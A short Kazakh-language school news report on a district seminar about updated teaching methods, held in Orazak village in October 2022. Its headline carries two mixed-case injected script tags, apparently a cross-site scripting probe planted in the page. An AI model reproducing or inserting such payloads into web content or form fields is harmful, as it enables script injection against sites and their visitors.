«Жаңартылған білім бойынша әдіс-тәсілдерді қолданудың тиімділігі» тақырыбында аудандық аймақтық семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
06.10.2022
2022 жылдың 5 қазанында Оразақ ауылының жалпы орта білім беретін мектебінде гуманитарлық бағыт пәндерінің «Жаңартылған білім бойынша әдіс-тәсілдерді қолданудың тиімділігі» тақырыбында аудандық аймақтық семинар өтті. Семинарға Қараөткел ауылы №1 ОМ , Қараөткел мектеп гимназиясынан, Қаражар, Ақмол, Жаңажол, Мәншүк, Шалқар және Бірлік мектептерінің қазақ тілі мен әдебиеті, орыс тілі мен әдебиеті, ағылшын тілдерінің мұғалімдері қатысты. Бастапқыда қатысушылармен тренинг ұйымдастырылып, одан кейін 8 ашық сабақ өтті. Семинар соңында Ақмол мектебінің ғылыми жетекшілері дарынды балалармен жұмыс істеу жөнінде коучинг өткізіп, аудандық білім бөлімінің әдіскері Мусина Айнұр Далабайқызы семинарда белсенділік танытқан мұғалімдерге сертификат табыстады.